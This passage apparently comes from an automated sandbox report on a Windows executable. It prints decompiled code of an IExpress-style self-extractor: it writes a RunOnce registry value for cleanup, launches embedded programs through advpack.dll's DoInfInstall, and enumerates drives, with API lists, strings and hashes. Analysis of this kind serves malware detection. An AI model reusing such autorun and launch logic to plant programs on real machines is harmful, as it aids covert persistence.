				SetUnhandledExceptionFilter(0xf37310); // executed
				return 0;
			}

0x00f37365
0x00f3736d

APIs

SetUnhandledExceptionFilter.KERNELBASE(00F37310), ref: 00F37365

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 788b65b5a634c91c29e4462a0f2a94c9074e88e95abc9008f05d87cbfd8ff7b0
Instruction ID: 4b2f781f93d53ee7cf7e186b7fa8f62f7f9b2fb1d32ee74fad1e53af797a73dd
Opcode Fuzzy Hash: 788b65b5a634c91c29e4462a0f2a94c9074e88e95abc9008f05d87cbfd8ff7b0
Instruction Fuzzy Hash: B49002E0255208965A103B725C0944936916B48632F811C60A441C4055DA9180807913

Uniqueness

Uniqueness Score: -1.00%

Function 00F31E6B, Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F31E6B(int __edx) {
				signed int _v8;
				void _v267;
				char _v268;
				void _v527;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t30;
				long _t38;
				long _t42;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				CHAR* _t55;
				signed int _t57;
				signed int _t62;
				int _t65;
				intOrPtr* _t72;
				signed int _t73;
				void* _t75;
				signed int _t76;
				void* _t80;
				intOrPtr* _t81;
				void* _t84;
				int _t85;
				struct HINSTANCE__* _t86;
				void* _t88;
				signed int _t90;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t30 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t30 ^ _t93;
				_t67 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x103);
				_v528 = 0;
				memset( &_v527, 0, 0x103);
				_t95 = _t94 + 0x18;
				_t90 = 0;
				_t38 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v540); // executed
				if(_t38 != 0) {
					L24:
					return E00F36C20(_t38, _t67, _v8 ^ _t93, _t79, _t84, _t90);
				}
				_push(_t84);
				_t85 = 0;
				while(1) {
					E00F31524("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t85);
					_t95 = _t95 + 0x10;
					_t42 = RegQueryValueExA(_v532, "wextract_cleanup0", _t67, _t67, _t67,  &_v536); // executed
					if(_t42 != 0) {
						break;
					}
					_t85 = _t85 + 1;
					if(_t85 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t85 != 0xc8) {
					_t67 = 0x104;
					GetSystemDirectoryA( &_v528, 0x104);
					_t79 = 0x104;
					E00F364E7( &_v528, 0x104, "advpack.dll");
					_t47 = LoadLibraryA( &_v528); // executed
					_t86 = _t47;
					__eflags = _t86;
					if(__eflags == 0) {
						L10:
						_t49 = GetModuleFileNameA( *0xf39164,  &_v268, _t67);
						__eflags = _t49;
						if(_t49 == 0) {
							L17:
							_t38 = RegCloseKey(_v532);
							L23:
							_pop(_t84);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t50 =  *_t72;
							_t72 = _t72 + 1;
							__eflags = _t50;
						} while (_t50 != 0);
						_t73 = _t72 - _t80;
						__eflags = _t73;
						_t81 = 0xf39224;
						do {
							_t51 =  *_t81;
							_t81 = _t81 + 1;
							__eflags = _t51;
						} while (_t51 != 0);
						_t67 = _t73 + 0x50 + _t81 - 0xf39225;
						_t88 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf39225);
						__eflags = _t88;
						if(_t88 != 0) {
							__eflags = _t90;
							 *0xf3856c = 0 | _t90 == 0x00000000;
							_t55 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							__eflags = _t90;
							if(_t90 == 0) {
								_t55 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E00F31524(_t88, _t67, _t55,  &_v268);
							_t75 = _t88;
							_t25 = _t75 + 1; // 0x1
							_t79 = _t25;
							do {
								_t57 =  *_t75;
								_t75 = _t75 + 1;
								__eflags = _t57;
							} while (_t57 != 0);
							_t76 = _t75 - _t79;
							__eflags = _t76;
							_t26 = _t76 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t88, _t26); // executed
							RegCloseKey(_v532); // executed
							_t38 = LocalFree(_t88);
							goto L23;
						}
						_t79 = 0x4b5;
						__eflags = 0;
						E00F34327(0, 0x4b5, _t52, _t52, 0x10, _t52);
						goto L17;
					}
					_t62 = GetProcAddress(_t86, "DelNodeRunDLL32");
					asm("sbb esi, esi"); // executed
					FreeLibrary(_t86); // executed
					_t90 =  ~( ~_t62);
					if(__eflags == 0) {
						goto L10;
					}
					_t65 = GetSystemDirectoryA( &_v268, 0x104);
					__eflags = _t65;
					if(_t65 != 0) {
						E00F364E7( &_v268, 0x104, 0xf31111);
					}
					goto L11;
				}
				_t38 = RegCloseKey(_v532);
				 *0xf38570 = _t67;
				goto L23;
			}

0x00f31e6b
0x00f31e76
0x00f31e7d
0x00f31e8d
0x00f31e92
0x00f31e98
0x00f31ea4
0x00f31eac
0x00f31eb1
0x00f31eba
0x00f31ed7
0x00f31edf
0x00f3209a
0x00f320a9
0x00f320a9
0x00f31ee5
0x00f31ee6
0x00f31ee8
0x00f31ef5
0x00f31efa
0x00f31f12
0x00f31f1a
0x00000000
0x00000000
0x00f31f1c
0x00f31f23
0x00000000
0x00000000
0x00000000
0x00f31f23
0x00f31f2b
0x00f31f44
0x00f31f51
0x00f31f5c
0x00f31f64
0x00f31f70
0x00f31f76
0x00f31f78
0x00f31f7a
0x00f31fbf
0x00f31fcd
0x00f31fd3
0x00f31fd5
0x00f3201f
0x00f32025
0x00f32099
0x00f32099
0x00000000
0x00f32099
0x00f31fd7
0x00f31fd7
0x00f31fdd
0x00f31fe0
0x00f31fe0
0x00f31fe2
0x00f31fe3
0x00f31fe3
0x00f31fe7
0x00f31fe7
0x00f31fe9
0x00f31ff1
0x00f31ff1
0x00f31ff3
0x00f31ff4
0x00f31ff4
0x00f31ffd
0x00f32008
0x00f3200a
0x00f3200c
0x00f3202f
0x00f32034
0x00f32039
0x00f3203e
0x00f32040
0x00f32042
0x00f32042
0x00f32047
0x00f32056
0x00f3205b
0x00f32060
0x00f32060
0x00f32063
0x00f32063
0x00f32065
0x00f32066
0x00f32066
0x00f3206a
0x00f3206a
0x00f3206c
0x00f32080
0x00f3208c
0x00f32093
0x00000000
0x00f32093
0x00f32013
0x00f32018
0x00f3201a
0x00000000
0x00f3201a
0x00f31f82
0x00f31f8d
0x00f31f8f
0x00f31f95
0x00f31f97
0x00000000
0x00000000
0x00f31fa1
0x00f31fa7
0x00f31fa9
0x00f31fb8
0x00f31fb8
0x00000000
0x00f31fa9
0x00f31f33
0x00f31f39
0x00000000

APIs

memset.MSVCRT ref: 00F31E98
memset.MSVCRT ref: 00F31EAC
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,?,00000000), ref: 00F31ED7

Part of subcall function 00F31524: _vsnprintf.MSVCRT ref: 00F31556

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F12
RegCloseKey.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F33
GetSystemDirectoryA.KERNEL32 ref: 00F31F51
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F70
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F31F82
FreeLibrary.KERNELBASE(00000000,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31F8F
GetSystemDirectoryA.KERNEL32 ref: 00F31FA1
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F31FCD
LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F32002
RegCloseKey.ADVAPI32(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F32025
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,00000000), ref: 00F32080
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F3208C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 00F32093

Strings

rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00F32039
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F31FE9, 00F32047
DelNodeRunDLL32, xrefs: 00F31F7C
wextract_cleanup%d, xrefs: 00F31EE9
advpack.dll, xrefs: 00F31F57
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00F31ECD
%s /D:%s, xrefs: 00F32042, 00F32053
wextract_cleanup0, xrefs: 00F31EF0, 00F31F07, 00F31F39, 00F32075

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-3765599613
Opcode ID: f0fe11c1ec8df4b7b69b1e7f9e4a22e7ef6f60d6c80365b71c010f8163897823
Instruction ID: 1f14ea794bbe19f3da3a5d93e5bb9f050d88643a1eb01943523f8ba0fb255f7a
Opcode Fuzzy Hash: f0fe11c1ec8df4b7b69b1e7f9e4a22e7ef6f60d6c80365b71c010f8163897823
Instruction Fuzzy Hash: F75104B2A0020CAFDB259B24CC88FFA777DEB503B4F0441A4F985A2151DB75CE49BB21

Uniqueness

Uniqueness Score: -1.00%

Function 00F339F1, Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 311
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00F339F1() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t70;
				signed int _t77;
				void* _t78;
				signed int _t80;
				short _t95;
				signed int _t96;
				intOrPtr _t97;
				signed int _t100;
				signed int _t103;
				signed int _t107;
				int _t111;
				signed int _t114;
				signed char _t117;
				signed int _t118;
				signed int _t119;
				int _t121;
				void* _t124;
				signed int _t126;
				void* _t127;
				struct HINSTANCE__* _t128;
				void* _t129;
				short _t136;
				char* _t139;
				signed char _t143;
				signed char _t144;
				signed int _t148;
				void* _t149;
				void* _t150;
				signed int _t152;
				void* _t154;
				void* _t155;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t164;

				_t163 = (_t161 & 0xfffffff8) - 0x194;
				_t70 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t70 ^ _t163;
				_t126 = 0;
				_t152 = 0;
				 *0xf39a88 = 0;
				_t148 = 0;
				_v392 = 0;
				_v384 = 0;
				_t164 =  *0xf38948 - _t126; // 0x0
				if(_t164 != 0) {
					L5:
					_v388 = _t126;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t163 = _t163 + 0xc;
						_v348 = 0x44;
						__eflags =  *0xf38b62;
						if( *0xf38b62 != 0) {
							goto L28;
						}
						_t145 =  &_v396;
						_t114 = E00F34538("SHOWWINDOW",  &_v396, 4);
						__eflags = _t114;
						if(_t114 == 0) {
							L27:
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L4:
							_t145 = 0x4b1;
							E00F34327(0, 0x4b1);
							 *0xf39a88 = 0x80070714;
							L64:
							_t78 = 0;
							L65:
							_pop(_t149);
							_pop(_t155);
							_pop(_t127);
							return E00F36C20(_t78, _t127, _v12 ^ _t163, _t145, _t149, _t155);
						}
						__eflags = _t114 - 4;
						if(_t114 > 4) {
							goto L27;
						}
						__eflags = _v396 - 1;
						if(_v396 != 1) {
							__eflags = _v396 - 2;
							if(_v396 != 2) {
								_t136 = 3;
								__eflags = _v396 - _t136;
								if(_v396 == _t136) {
									_v304 = 1;
									_v300 = _t136;
								}
								L16:
								__eflags = _t126;
								if(_t126 != 0) {
									L29:
									_t154 = 1;
									__eflags = _t126 - 1;
									if(_t126 != 1) {
										L33:
										_t131 =  &_v280;
										_t77 = E00F31910( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t77;
										if(_t77 == 0) {
											goto L64;
										}
										_t156 = _v404;
										__eflags = _t148;
										if(_t148 != 0) {
											L39:
											__eflags = _t156;
											if(_t156 == 0) {
												L59:
												_t150 = _v408;
												_t145 =  &_v352;
												_t129 = _t150; // executed
												_t80 = E00F33E45(_t129,  &_v352); // executed
												__eflags = _t80;
												if(_t80 == 0) {
													L63:
													LocalFree(_t150);
													goto L64;
												}
												L60:
												LocalFree(_t150);
												_t126 = _t126 + 1;
												_v392 = _t126;
												__eflags = _t126 - 2;
												if(_t126 >= 2) {
													_t154 = 1;
													__eflags = 1;
													L71:
													__eflags =  *0xf3856c;
													if( *0xf3856c != 0) {
														E00F320AF();
													}
													_t78 = _t154;
													goto L65;
												}
												_t152 = _v396;
												_t148 = _v388;
												continue;
											}
											L40:
											__eflags =  *0xf381c4;
											if( *0xf381c4 == 0) {
												_t145 = 0x4c7;
												E00F34327(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0xf39a88 = 0x8007042b;
												goto L64;
											}
											__eflags = _t156;
											if(_t156 == 0) {
												goto L59;
											}
											__eflags =  *0xf39a74 & 0x00000004;
											if(__eflags == 0) {
												goto L59;
											}
											_t128 = E00F3635A(_t126, _t131, _t156, __eflags);
											__eflags = _t128;
											if(_t128 == 0) {
												_t145 = 0x4c8;
												E00F34327(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L67:
												LocalFree(_v408);
												 *0xf39a88 = E00F3613C();
												goto L64;
											}
											_t145 = GetProcAddress(_t128, "DoInfInstall");
											_v404 = _t145;
											__eflags = _t145;
											if(_t145 == 0) {
												_t145 = 0x4c9;
												__eflags = 0;
												E00F34327(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t128);
												goto L67;
											}
											_v384 = _v384 & 0x00000000;
											__eflags =  *0xf38950;
											_t150 = _v408;
											_v368 =  &_v280;
											_t95 =  *0xf39a80; // 0x3
											_v364 = _t95;
											_t96 =  *0xf38958 & 0x0000ffff;
											_v380 = 0xf39194;
											_v376 = _t150;
											_v372 = 0xf39224;
											_v360 = _t96;
											if( *0xf38950 != 0) {
												_t96 = _t96 | 0x00010000;
												__eflags = _t96;
												_v360 = _t96;
											}
											_t143 =  *0xf39a74; // 0x1
											__eflags = _t143 & 0x00000008;
											if((_t143 & 0x00000008) != 0) {
												_t96 = _t96 | 0x00020000;
												__eflags = _t96;
												_v360 = _t96;
											}
											__eflags = _t143 & 0x00000010;
											if((_t143 & 0x00000010) != 0) {
												_t96 = _t96 | 0x00040000;
												__eflags = _t96;
												_v360 = _t96;
											}
											_t144 =  *0xf38c68; // 0x0
											__eflags = _t144 & 0x00000040;
											if((_t144 & 0x00000040) != 0) {
												_t96 = _t96 | 0x00080000;
												__eflags = _t96;
												_v360 = _t96;
											}
											__eflags = _t144;
											if(_t144 < 0) {
												_t103 = _t96 | 0x00100000;
												__eflags = _t103;
												_v360 = _t103;
											}
											_t97 =  *0xf39a78; // 0x0
											_v356 = _t97;
											_t129 = _t145;
											 *0xf3a290( &_v384);
											_t100 = _v404();
											__eflags = _t163 - _t163;
											if(_t163 != _t163) {
												_t129 = 4;
												asm("int 0x29");
											}
											 *0xf39a88 = _t100;
											_push(_t128);
											__eflags = _t100;
											if(_t100 < 0) {
												FreeLibrary();
												goto L63;
											} else {
												FreeLibrary();
												_t126 = _v396;
												goto L60;
											}
										}
										__eflags =  *0xf39a80 - 1; // 0x3
										if(__eflags == 0) {
											goto L39;
										}
										__eflags =  *0xf38940;
										if( *0xf38940 == 0) {
											goto L39;
										}
										__eflags = _t156;
										if(_t156 != 0) {
											goto L40;
										}
										_v388 = 1;
										E00F31E6B(_t145); // executed
										goto L39;
									}
									_t145 =  &_v280;
									_t107 = E00F34538("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t107;
									if(_t107 == 0) {
										goto L27;
									}
									__eflags =  *0xf38b62;
									if( *0xf38b62 != 0) {
										goto L71;
									}
									_t111 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t111 == 0;
									if(_t111 == 0) {
										goto L71;
									}
									goto L33;
								}
								_t117 =  *0xf38958; // 0x0
								__eflags = _t117;
								if(_t117 == 0) {
									L25:
									__eflags = _t152;
									if(_t152 != 0) {
										goto L33;
									}
									_t145 =  &_v276;
									_t118 = E00F34538("RUNPROGRAM",  &_v276, 0x104);
									__eflags = _t118;
									if(_t118 != 0) {
										goto L29;
									}
									goto L27;
								}
								__eflags = _t117 & 0x00000001;
								if((_t117 & 0x00000001) == 0) {
									__eflags = _t117 & 0x00000002;
									if((_t117 & 0x00000002) == 0) {
										goto L64;
									}
									_t139 = "USRQCMD";
									L22:
									_t145 =  &_v276;
									_t119 = E00F34538(_t139,  &_v276, 0x104);
									__eflags = _t119;
									if(_t119 == 0) {
										goto L27;
									}
									_t121 = CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t121 - 2 - 0xfffffffe;
									if(_t121 - 2 != 0xfffffffe) {
										_t152 = 1;
										__eflags = 1;
										_v392 = 1;
									}
									goto L25;
								}
								_t139 = "ADMQCMD";
								goto L22;
							}
							_push(6);
							_v304 = 1;
							_pop(0);
							L13:
							_v300 = 0;
							goto L16;
						}
						_v304 = 1;
						goto L13;
						L28:
						_push(_t129);
						_t145 = 0x104;
						E00F3158C( &_v276, 0x104, _t129, 0xf38b62);
						goto L29;
					}
				}
				_t129 = "REBOOT";
				_t124 = E00F34538(_t129, 0xf39a6c, 4);
				if(_t124 == 0 || _t124 > 4) {
					_push(_t126);
					_push(0x10);
					_push(_t126);
					_push(_t126);
					goto L4;
				} else {
					goto L5;
				}
			}

0x00f339f9
0x00f339ff
0x00f33a06
0x00f33a0e
0x00f33a11
0x00f33a13
0x00f33a1a
0x00f33a1c
0x00f33a20
0x00f33a24
0x00f33a2a
0x00f33a66
0x00f33a66
0x00f33a6a
0x00f33a6a
0x00f33a78
0x00f33a7d
0x00f33a80
0x00f33a88
0x00f33a8f
0x00000000
0x00000000
0x00f33a97
0x00f33aa0
0x00f33aa5
0x00f33aa7
0x00f33b7a
0x00f33b7c
0x00f33b7d
0x00f33b7f
0x00f33b80
0x00f33a4b
0x00f33a4b
0x00f33a52
0x00f33a57
0x00f33d9c
0x00f33d9c
0x00f33d9e
0x00f33da5
0x00f33da6
0x00f33da7
0x00f33db2
0x00f33db2
0x00f33aad
0x00f33ab0
0x00000000
0x00000000
0x00f33ab9
0x00f33abd
0x00f33ac7
0x00f33acc
0x00f33ade
0x00f33adf
0x00f33ae3
0x00f33ae5
0x00f33ae9
0x00f33ae9
0x00f33aee
0x00f33aee
0x00f33af0
0x00f33b9e
0x00f33ba0
0x00f33ba1
0x00f33ba3
0x00f33bee
0x00f33bf8
0x00f33bff
0x00f33c04
0x00f33c06
0x00000000
0x00000000
0x00f33c0c
0x00f33c10
0x00f33c12
0x00f33c36
0x00f33c36
0x00f33c38
0x00f33d5a
0x00f33d5a
0x00f33d5e
0x00f33d62
0x00f33d64
0x00f33d69
0x00f33d6b
0x00f33d95
0x00f33d96
0x00000000
0x00f33d96
0x00f33d6d
0x00f33d6e
0x00f33d74
0x00f33d75
0x00f33d79
0x00f33d7c
0x00f33e2a
0x00f33e2a
0x00f33e2b
0x00f33e2b
0x00f33e32
0x00f33e34
0x00f33e34
0x00f33e39
0x00000000
0x00f33e39
0x00f33d82
0x00f33d86
0x00000000
0x00f33d86
0x00f33c3e
0x00f33c3e
0x00f33c45
0x00f33dfe
0x00f33e0a
0x00f33e13
0x00f33e19
0x00000000
0x00f33e19
0x00f33c4b
0x00f33c4d
0x00000000
0x00000000
0x00f33c53
0x00f33c5a
0x00000000
0x00000000
0x00f33c65
0x00f33c67
0x00f33c69
0x00f33dee
0x00f33df5
0x00f33dcd
0x00f33dd1
0x00f33ddc
0x00000000
0x00f33ddc
0x00f33c7c
0x00f33c7e
0x00f33c82
0x00f33c84
0x00f33dba
0x00f33dbf
0x00f33dc1
0x00f33dc7
0x00000000
0x00f33dc7
0x00f33c8a
0x00f33c96
0x00f33c9d
0x00f33ca1
0x00f33ca5
0x00f33cab
0x00f33cb0
0x00f33cb7
0x00f33cbf
0x00f33cc3
0x00f33ccb
0x00f33ccf
0x00f33cd1
0x00f33cd1
0x00f33cd6
0x00f33cd6
0x00f33cda
0x00f33ce0
0x00f33ce3
0x00f33ce5
0x00f33ce5
0x00f33cea
0x00f33cea
0x00f33cee
0x00f33cf1
0x00f33cf3
0x00f33cf3
0x00f33cf8
0x00f33cf8
0x00f33cfc
0x00f33d02
0x00f33d05
0x00f33d07
0x00f33d07
0x00f33d0c
0x00f33d0c
0x00f33d10
0x00f33d12
0x00f33d14
0x00f33d14
0x00f33d19
0x00f33d19
0x00f33d1d
0x00f33d24
0x00f33d28
0x00f33d2f
0x00f33d35
0x00f33d39
0x00f33d3b
0x00f33d3d
0x00f33d42
0x00f33d42
0x00f33d44
0x00f33d49
0x00f33d4a
0x00f33d4c
0x00f33d8f
0x00000000
0x00f33d4e
0x00f33d4e
0x00f33d54
0x00000000
0x00f33d54
0x00f33d4c
0x00f33c17
0x00f33c1e
0x00000000
0x00000000
0x00f33c20
0x00f33c27
0x00000000
0x00000000
0x00f33c29
0x00f33c2b
0x00000000
0x00000000
0x00f33c2d
0x00f33c31
0x00000000
0x00f33c31
0x00f33baa
0x00f33bb6
0x00f33bbb
0x00f33bbd
0x00000000
0x00000000
0x00f33bbf
0x00f33bc6
0x00000000
0x00000000
0x00f33be0
0x00f33be7
0x00f33be8
0x00000000
0x00000000
0x00000000
0x00f33be8
0x00f33af6
0x00f33afc
0x00f33aff
0x00f33b58
0x00f33b58
0x00f33b5a
0x00000000
0x00000000
0x00f33b65
0x00f33b71
0x00f33b76
0x00f33b78
0x00000000
0x00000000
0x00000000
0x00f33b78
0x00f33b01
0x00f33b03
0x00f33b0c
0x00f33b0e
0x00000000
0x00000000
0x00f33b14
0x00f33b19
0x00f33b1e
0x00f33b25
0x00f33b2a
0x00f33b2c
0x00000000
0x00000000
0x00f33b43
0x00f33b4c
0x00f33b4f
0x00f33b53
0x00f33b53
0x00f33b54
0x00f33b54
0x00000000
0x00f33b4f
0x00f33b05
0x00000000
0x00f33b05
0x00f33ace
0x00f33ad0
0x00f33ad4
0x00f33ad5
0x00f33ad5
0x00000000
0x00f33ad5
0x00f33abf
0x00000000
0x00f33b86
0x00f33b86
0x00f33b8d
0x00f33b99
0x00000000
0x00f33b99
0x00f33a6a
0x00f33a33
0x00f33a38
0x00f33a3f
0x00f33a46
0x00f33a47
0x00f33a49
0x00f33a4a
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00F33A78
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F33B43

Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F38B62), ref: 00F33BE0
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F33C76
FreeLibrary.KERNEL32(00000000,?,00F38B62), ref: 00F33D4E
LocalFree.KERNEL32(?,?,?,?,00F38B62), ref: 00F33D6E
FreeLibrary.KERNEL32(00000000,?,00F38B62), ref: 00F33D8F
LocalFree.KERNEL32(?,?,?,?,00F38B62), ref: 00F33D96
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F38B62), ref: 00F33DC7
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F38B62), ref: 00F33DD1
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F38B62), ref: 00F33E13

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00F33CC3
DoInfInstall, xrefs: 00F33C6F, 00F33C74, 00F33DB9
RUNPROGRAM, xrefs: 00F33B6C
advpack.dll, xrefs: 00F33DE9
<None>, xrefs: 00F33B30, 00F33BCE
Umorals4, xrefs: 00F33CB7
ADMQCMD, xrefs: 00F33B05
USRQCMD, xrefs: 00F33B14
REBOOT, xrefs: 00F33A33
SHOWWINDOW, xrefs: 00F33A9B
D, xrefs: 00F33A80
POSTRUNPROGRAM, xrefs: 00F33BB1

Memory Dump Source

Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$Local$Library$CompareResourceString$AddressFindProcSizeofmemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$Umorals4$advpack.dll
API String ID: 2245518414-3849701229
Opcode ID: 84c7164eca5eeda2131ed63d710a015731f11da0c0567d0e61022048879eac74
Instruction ID: 45a84f1a2b7808ca4514953f96125bb9f7e27b3b44ed8b6d9e597e6c93995730
Opcode Fuzzy Hash: 84c7164eca5eeda2131ed63d710a015731f11da0c0567d0e61022048879eac74
Instruction Fuzzy Hash: FAB1F470A083459BD720DF248C45B6BB7E5EB84770F10092DF991D72A0DBB8DA44FB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F35467, Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00F35467() {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0xf38000; // 0xfdaca2c3
				_v8 = _t28 ^ _t110;
				_t2 = E00F34538("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E00F34538(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0xf39a70 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0xf38a5e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0xf38944; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00F363E1(_t82, 0x7d2, 0, E00F330C0, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0xf39a70; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0xf39224;
									_t40 = GetTempPathA(0x104, 0xf39224);
									__eflags = _t40;
									if(_t40 == 0) {
										L20:
										_push(_t82);
										E00F3158C( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L23:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
